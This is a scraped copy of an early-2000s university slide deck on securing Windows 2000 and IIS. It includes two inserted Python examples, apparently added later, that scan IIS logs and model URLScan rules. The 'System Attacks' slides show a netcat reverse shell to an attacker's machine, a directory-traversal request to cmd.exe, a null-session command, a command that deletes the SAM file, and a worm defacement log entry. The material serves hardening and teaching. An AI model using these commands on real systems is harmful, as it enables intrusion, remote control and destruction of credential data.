8/14/2019 WinSecurity
http://slidepdf.com/reader/full/winsecurity 1/70
Windows 2000 Security
Matthew Cook
Loughborough University
http://www.escarpment.net/
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
Janet Web Cache Service
http://wwwcache.ja.net
Security @ Lboro
- Evaluation of Security Service/Policy
- Demand for Windows and Linux security advice
- Need for other OS security advice
- Installation of Internet Facing Windows 2000 systems.
Windows 2000 Security
- Overview of General Security Threats
- Workstation Security
- Server Security
- IIS Security
- Security Tools
- Questions and Answers
Physical Security
"The only system which is truly secure is one which is switched off and unplugged, locked in a titanium-lined safe, buried in a concrete bunker, and is surrounded by … very highly paid armed guards. Even then, I wouldn't stake my life on it."
Gene Spafford
Security Threats
- Denial of Service
- Theft of information
- Modification
- Fabrication (Spoofing or Masquerading)
Security Holes
- Physical Security Holes
- Software Security Holes
- Incompatible Usage Security Holes
- Social Engineering
- Complacency
Workstation Security
Security for General Workstations
Workstation Security
- Physical Security
- BIOS
- Service Packs and Hot fixes
- NTFS ACLS
- Policies and Profiles
- Security Templates
- Auditing
- Threats
Service Packs and Hot fixes
- Ensure you have the latest ‘evaluated’ service packs and hot fixes.
- Check the model periodically
- Hfnetchk Tool
NTFS ACLS
- Ensure you use NTFS
- Partition your drives per application
- Use xcacls from the Resource Kit
- Script NTFS security
- Set using Security Templates
- Example
Policies and Profiles
- NT Policy files are different to GPO (Group Policy Objects) in Windows 2000
- LGPO located in: %windir%\system32\grouppolicy
- ADGPO located in: %windir%\system32\sysvol\camford\policies
- Demonstration
Security Templates
- Use ‘Security Settings’ applet to apply
- Located in %windir%\security\templates
- Quick and Easy to apply
- Templates are accumulative
- Demonstration
Security Templates…
- Setup security – Default settings
- Compatws – Compatible
- Basicdc/sv/wk – Basic Security
- Securedc/wk – More Secure
- Hisecdc/ws – Further Security
- Ocfiless/w – Optional Components
Auditing & Event Logs
- Use the ‘Security Settings’ applet to ensure the Audit Policy has been configured
- Check the Event Viewer regularly
- Or use NTLast (Foundstone)
- URL: http://www.foundstone.com/
- Or ELM (TNT Software)
- URL: http://www.tntsoftware.com/
Threats
- PipeUpAdmin and PipeUpSAM
- Netddemsg
- EFS
- DOS Boot disc
- Linux Boot disc
- BIOS Passwords
PipeUpAdmin & PipeUpSAM
- Uses vulnerability in Named Pipes in the Service Control Manager (SCM)
- Adds user to Administrator Group
- Patch Bulletin: MS00-053
- URL: http://www.dogmile.com/files/
Netddemsg
- Uses vulnerability in NetDDE
- Provides cmd in SYSTEM context
- Patch Bulletin: MS01-007
- NOT included in Windows 2000 SP2
EFS
- Changing the password of the recovery agent (Administrator)
- Changing the password of the user
- EFS temporary files
DOS Boot Disc
- DOS NTFS drivers bypass NTFS ACLS
- Allows removal of the SAM
  del %windir%\system32\config\sam
- Allows extraction of the SAM
- URL: http://www.sysinternals.com/
- URL: http://www.esiea.fr/public_html/Christophe.GRENIER/
Linux Boot Disc
- Edit SAM password hashes
- Disable SYSKEY
- Limited SCSI support
- URL: http://home.eunet.no/~pnordahl/
BIOS Passwords
- Even a BIOS password is not secure
- Check for vulnerabilities
- Check for Default Passwords
- Upgrade BIOS
- URL: http://www.esiea.fr/public_html/Christophe.GRENIER/
Server Security
Security for Internet Facing Servers
Server Security
- Advice for Workstation Security
- NetBIOS/SMB Services
- Hfnetchk and Qchain
- SNMP Vulnerabilities
- Active Directory Vulnerabilities
- IPSec
NetBIOS/SMB Services
- NetBIOS Name Service [Port UDP 137]
- NetBIOS Session Service [Port TCP 139]
- SMB over TCP [Port 445]
- Port 445 Windows 2000 only
- Block TCP/UDP 135-139 and 445 at the firewall
NetBIOS/SMB Services…
Null Authentication:
  Net use \\camford\IPC$ "" /u:""
- Famous tools like ‘Red Button’
  Net view \\camford
- Investigate srvcheck and srvinfo in the Resource Kit
NetBIOS/SMB Services…
- Dumpsec from Somarsoft
- URL: http://www.somarsoft.com
- Enum from Razor
- URL: http://razor.bindview.com/
- A Google search reveals many, many more
NetBIOS/SMB Services…
To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window
NetBIOS/SMB Services…
Disable Null Authentication
- Key similar to Windows NT 4.0
- HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
- REG_DWORD set to 0, 1 or 2!
- HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
- REG_DWORD set to 0 or 1
Hfnetchk
- Use Hfnetchk to check hot fixes
- Checks machines against Microsoft XML
- Automate the process using batch files and a mail client (Postie)
- URL: http://www.infradig.com/infradig/postie/
- Use QChain to chain hot fixes together without rebooting in-between.
Hfnetchk…
Patch details for:
- Windows NT 4.0 and Windows 2000
- IIS 4 and IIS 5
- SQL Server 7.0
- SQL Server 2000
- Internet Explorer 5.01 (and later)
Hfnetchk…
- Default scan of local host (pre-downloaded XML)
  hfnetchk -x mssecure.xml
- Default scan of lboro domain
  hfnetchk -d lboro
- Verbose scan of local host
  hfnetchk -v -x mssecure.xml
- Verbose scan including installed hot fixes
  hfnetchk -v -a b -x mssecure.xml
Hfnetchk…
- Test problems
  hfnetchk -z -v -x mssecure.xml
- XML File Download
  http://download.microsoft.com/download/xml/security/1.0/nt5/en-us/mssecure.cab
- Using an internal copy of the XML
  hfnetchk -x http://camford.ac.uk/mssecure.xml
  hfnetchk -x s:\camford\mssecure.xml
QChain
Supported by:
- Windows NT 4.0
- Windows 2000
- Windows XP (25th October 2001)
QChain…
- Run the hot fix with -z (No reboot) and -m (Quiet mode)
- Run qchain and then reboot
- Create a log using qchain [logname]
- Create batch files on a central server
- URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=29821
SNMP Vulnerabilities
- Simple Network Management Protocol
- Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
- SNMP Utilities in Resource Kit
- Turn off SNMP services
- Set community names
- Set accepted hosts
IPSec
- Currently investigating
- Linux Connectivity using FreeS/WAN
- Mainly for wireless use
- WEP encryption cracked
- URL: http://www.freeswan.org/
- URL: http://airsnort.sourceforge.net/
IIS Security
Internet Information Server
IIS Security
- History
- Recent Worms
- IIS Lock Down Tool
- URL Scan
- The Future
IIS History
- IIS 2.0 Installed by NT 4.0
- IIS 3.0 followed by more common IIS 4.0
- Quickly gained reputation for (in)security
- IIS 5.0 Installed by Windows 2000
- Microsoft releases Hfnetchk
- Closely followed by IIS Lockdown and URLScan
Recent Worms
- Sadmind/IIS
  Directory Traversal (Unicode Exploit)
- CodeRed
  ida/idq buffer overflow
- CodeGreen
  ida/idq buffer overflow
- Nimda
  Directory Traversal (Unicode Exploit)
Sadmind/IIS
- 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -
System Attacks
- Monday Morning Phone Call
- Perl Script ‘unicodeloader’
- http://camford/scripts/upload.asp
- http://camford/scripts/cmdasp.asp
- Sadmind/IIS worm and unicodeloader kit
- GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 –
- URL: http://www.sensepost.com/
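The worm log entry on the Sadmind/IIS slide and the traversal request above are what an administrator has to find in the IIS logs after the Monday morning phone call. As an added example (not code from the original talk), a Python scanner that parses constructed IIS W3C-style log lines, decodes the overlong UTF-8 and double-encoded forms the Unicode exploit relied on, and flags traversal out of the web root, cmd.exe/root.exe requests and long .ida/.idq queries; the field order and the query-length threshold are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

FIELDS = ["date", "time", "c_ip", "user", "s_ip", "port", "method", "stem", "query", "status"]
SUSPECT_EXES = ("cmd.exe", "root.exe")

# Constructed IIS W3C-style log sample (field order assumed as in FIELDS):
# lines 1-4 mimic the worm hits discussed above, line 5 is ordinary traffic.
SAMPLE_LOG = "\n".join([
    "2001-05-03 22:34:49 203.0.113.7 - 198.51.100.5 80 GET /scripts/root.exe /c+echo+defaced+>../wwwroot/default.htm 200",
    "2001-05-04 08:12:01 203.0.113.9 - 198.51.100.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200",
    "2001-07-19 13:00:17 203.0.113.4 - 198.51.100.5 80 GET /default.ida " + "N" * 150 + "%u9090 200",
    "2001-07-19 13:00:19 203.0.113.4 - 198.51.100.5 80 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404",
    "2001-07-19 13:01:05 198.51.100.20 - 198.51.100.5 80 GET /index.htm - 200",
])

def decode_uri(raw):
    """Double-decode %XX (IIS 5 'superfluous decode', MS01-026) and fold overlong %c0%af ('/') and %c1%9c ('\\')."""
    data = unquote_to_bytes(unquote_to_bytes(raw))
    data = re.sub(rb"[\xc0\xc1][\x80-\xbf]",
                  lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), data)
    return data.decode("latin-1").replace("\\", "/")

def escapes_webroot(path):
    """True if the '..' segments climb above the virtual root."""
    depth = 0
    for seg in path.split("/"):
        depth += -1 if seg == ".." else (1 if seg not in ("", ".") else 0)
        if depth < 0:
            return True
    return False

def scan_iis_log(text):
    """Return (line no, client IP, status, reasons) for suspicious requests."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if line.startswith("#") or len(parts) < len(FIELDS):
            continue  # directive or truncated line
        rec = dict(zip(FIELDS, parts))
        stem = decode_uri(rec["stem"]).lower()
        checks = [  # the 100-character query threshold is an assumed value
            (escapes_webroot(stem), "directory traversal"),
            (stem.endswith(SUSPECT_EXES), "command shell requested"),
            (stem.endswith((".ida", ".idq")) and len(rec["query"]) > 100, "ida/idq overflow pattern"),
        ]
        reasons = [label for flagged, label in checks if flagged]
        if reasons:  # a 200 status means the request succeeded: triage those first
            hits.append((n, rec["c_ip"], rec["status"], ", ".join(reasons)))
    return hits
```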
System Attacks…
- Obtaining a remote shell
- Attacking PC:
  nc -l -p 1234
- Camford:
  nc.exe -v -e cmd.exe <attackingpc> 1234
- URL: http://www.atstake.com/research/tools/
System Attacks…
- Shell is in the context of IUSR_camford
- ISAPI.dll – RevertToSelf (Horovitz)
- Upload using upload.asp
- http://camford/scripts/idq.dll
- Version 2 coded by Foundstone
- http://camford/scripts/idq.dll?
- Patch Bulletin: MS01-26
- NOT included in Windows 2000 SP2
IIS Lock Down Tool
- Automatic ‘Lock Down’
- Locks down IIS 4.0 and IIS 5.0
- Express ‘lock down’ for simple web sites
- Custom ‘lock down’ for more complex servers
- Undo facility to reverse last ‘lock down’
- URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362
IIS Lock Down Tool…
Disable:
- Active Server Pages
- Index Server Interface
- Server Side Includes
- Internet Data Connector
- Internet Printing
- HTR Scripting
Remove:
- Sample Web Files
- Script Virtual Directory
- MSADC Directory
- WebDAV
Set Permissions on:
- Exe files
- Content Directories
URL Scan
- ISAPI filter scans incoming HTTP requests
- Filtered based on rule set
- New rules easily added
- Default urlscan.ini suitable for static pages
- Restart service when changes made
- 404 and logged request for matched rules
- URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32571
URL Scan…
Filter on:
- The request method (verb)
- File Extension
- URL Encoding
- Non ASCII characters
- Malicious character sequence
- Headers in HTTP GET
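An added example (not URLScan's own code and not from the talk): a Python model of the urlscan.ini filters just listed, using URLScan's real section and option names ([AllowVerbs], [DenyExtensions], [DenyUrlSequences], VerifyNormalization, AllowHighBitCharacters) with constructed rule values and constructed requests. Each rejected request returns the rule that matched; the real filter answers it with 404 and logs it, as the previous slide says.

```python
from urllib.parse import unquote

# Rule set mirroring the urlscan.ini sections (constructed and trimmed; the
# section and option names are URLScan's own, the values are assumptions).
RULES = {
    "AllowVerbs": {"GET", "HEAD", "POST"},
    "DenyExtensions": {".exe", ".bat", ".cmd", ".ida", ".idq", ".htr", ".printer"},
    "DenyUrlSequences": ["..", "./", "\\", ":", "%", "&"],
    "AllowHighBitCharacters": False,
    "VerifyNormalization": True,
}

def scan_request(method, url, rules=RULES):
    """Return None if the request passes, otherwise the rule that rejected it.
    URLScan answers a rejected request with 404 and writes it to its log."""
    if method.upper() not in rules["AllowVerbs"]:
        return f"verb {method} not in [AllowVerbs]"
    path = url.split("?", 1)[0]
    normalized = unquote(path)  # NormalizeUrlBeforeScan=1
    # VerifyNormalization: a URL that decodes differently a second time was
    # double-encoded (the ..%255c trick against IIS 5's superfluous decode).
    if rules["VerifyNormalization"] and unquote(normalized) != normalized:
        return "double-encoded URL (VerifyNormalization)"
    # Overlong sequences such as %c0%af decode to U+FFFD here, so the
    # high-bit rule stops the Unicode traversal before any '..' check runs.
    if not rules["AllowHighBitCharacters"] and any(ord(c) > 127 for c in normalized):
        return "high-bit character in URL"
    for seq in rules["DenyUrlSequences"]:
        if seq in normalized:
            return f"denied sequence {seq!r} in URL"
    name = normalized.rsplit("/", 1)[-1]
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext in rules["DenyExtensions"]:
        return f"extension {ext} in [DenyExtensions]"
    return None

def audit(requests, rules=RULES):
    """Apply the rules to (method, url) pairs; returns [(method, url, verdict)]."""
    return [(m, u, scan_request(m, u, rules) or "allowed") for m, u in requests]

# Constructed requests: the worm/traversal patterns from the slides plus normal traffic.
SAMPLE_REQUESTS = [
    ("GET", "/default.htm"),
    ("POST", "/scripts/upload.asp"),
    ("PROPFIND", "/"),
    ("GET", "/scripts/../../winnt/system32/cmd.exe?/c+dir"),
    ("GET", "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"),
    ("GET", "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir"),
    ("GET", "/default.ida?" + "N" * 50),
]
```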
The Future
- Gartner report recommends ditching IIS
- Rewrite of IIS on the cards for version 6
- Lock Down Tool (Interim Measures)
- Httpd functionality in the kernel (TechEd)
- IIS Lockdown included in SP3
- Further implications for .NET
Security Tools
A look at the freeware and ‘pay for’ tools available.
Security Tools
- Snort
- CIS and Typhon
- Pwdump
- Fport
- L0pht Crack
- Nmap
- Nessus
- Pandora
Snort
- IDS – Intrusion Detection System
- Libpcap packet sniffer and logger
- Originally developed for the Unix platforms
- Open Source
- Port to Win32 available (Release 1.8.1)
- Installation on Win32 in under 30 minutes
- Run on your IIS server or standalone
Snort…
Snort can detect:
- Stealth Port Scans
- CGI Attacks
- Front Page Extensions Attacks
- ICMP Activity
- SMTP Activity
- SQL Activity
- SMB Probes
Snort…
- Default logging to snort\logs\alert.ids
- Log to mySQL and SQL Server
- Notification as logs, ‘winpopup’, email etc
- SnortSnarf or ACID (PHP Based)
- GUI – IDS Center
- URL: http://snort.sourcefire.com/
- URL: http://www.cert.org/kb/acid/
- URL: http://www.silicondefense.com/
CIS and Typhon
- Typhon, formerly Cerberus Internet Scanner
- Written by David Litchfield
- URL: http://www.nextgenss.com/
- Demonstration
CIS and Typhon
- Web Checks
- FTP Checks
- SMTP Checks
- POP3 Checks
- NT Checks
- NetBIOS Checks
- MS SQL Checks
- SNMP Checks
- RPC Checks
- Portscan (TCP/UDP)
- Finger Checks
- DNS Checks
- Commercial Version
Pwdump
- Version 3 (e = encrypted)
- Developed by Phil Staubs and Erik Hjelmstad
- Based on pwdump and pwdump2
- URL: http://www.ebiz-tech.com/html/pwdump.html
Pwdump…
- Needs Administrative Privileges
- Extracts hashes even if syskey is installed
- Extract from remote machines
- Identifies accounts with no password
- Self contained utility
Fport
- Reports on all open TCP and UDP ports
- Maps Port to Application
- Requires psapi.dll (Windows NT 4.0)
- URL: http://www.foundstone.com/
- Demonstration
L0pht Crack
- Password Auditing and Recovery
- Crack Passwords from many sources
- Registration $249
- URL: http://www.atstake.com/research/lc3/
- Demonstration
L0pht Crack…
Crack Passwords from:
- Local Machine
- Remote Machine
- SAM File
- SMB Sniffer
- PWDump file
Nmap
- Port Scanning Tool
- Stealth scanning, OS Fingerprinting
- Open Source
- Runs under Unix based OS
- Port development for Win32
- URL: http://www.insure.org/nmap/
Nessus
- Remote security scanner similar to Typhon
- Very comprehensive
- Frequently updated modules
- Testing of DoS attacks
- Open Source
- Win32 and Java Client
- URL: http://nessus.org/
Pandora
- Not strictly Windows 2000 Security
- Runs on either Unix or Win32
- Excellent tool to evaluate Netware security
- Open Source
- Lots of additional information
- URL: http://www.nmrc.org/pandora/